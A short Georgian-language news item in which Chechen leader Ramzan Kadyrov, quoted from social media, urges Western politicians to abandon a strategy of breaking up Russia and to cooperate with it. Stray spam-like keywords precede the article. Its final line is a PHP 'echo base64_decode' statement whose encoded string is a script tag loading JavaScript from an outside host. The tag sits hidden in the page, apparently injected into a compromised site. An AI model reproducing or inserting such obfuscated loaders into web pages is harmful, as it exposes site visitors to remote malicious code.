celsiusi
ავერსი საქკაბელი
დასავლელმა პოლიტიკოსებმა თავი უნდა აარიდონ რუსეთის დაშლის სტრატეგიას და იმაზე უნდა იფიქრონ, როგორ განავითარონ მასთან თანამშრომლობა, – ამის შესახებ ჩეჩნეთის ლიდერი რამზან კადიროვი სოციალურ ქსელში წერს.
 
მისი თქმით, დასავლური სამყარო ამ დრომდე ვერ ხვდება ერთ რამეს: თანამედროვე რუსეთი დიდი ხანია აღარ არის „გორბაჩოვისეული რესპუბლიკების კავშირი“ და „ელცინის ტერიტორია, რომელიც აშენებულია პუტჩზე, დეფიციტსა და დეფოლტზე“.
 
„ეს უკვე სხვა ძლიერი და ძლევამოსილი რუსეთია და თქვენ, დასავლელმა პოლიტიკოსებმა საჭიროა, გადახედოთ არა რუსეთის ფედერაციის დაშლის სტრატეგიას, არამედ იმ ქვეყანასთან თანამშრომლობას, რომელიც გაძარცვული და დასავლეთისგან დამცირებული, ბოლო 20 წელზე მეტი ხნის განმავლობაში, გადაიქცა ძლიერი პოლიტიკური დღის წესრიგის მქონე სახელმწიფოდ, რეორგანიზებული სტრატეგიული მიზნებით“ , - განაცხადა კადიროვმა.
 
კადიროვმა ურჩია დასავლეთის ქვეყნებმა ჯობს, არ იდავონ რუსეთთან და გაიხსენა რუსეთის ლიდერის ვლადიმერ პუტინის სიტყვები, რომ თუკი ვინმე მოინდომებს ქვეყანას რაიმე ჩამოაჭრას, უკბილოდ დატოვებს.
 
„ისწავლეთ რუსეთთან მეგობრობა - მაშინ კბილებსაც მთელს შეინარჩუნებთ“, - აცხადებს კადიროვი.
534
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");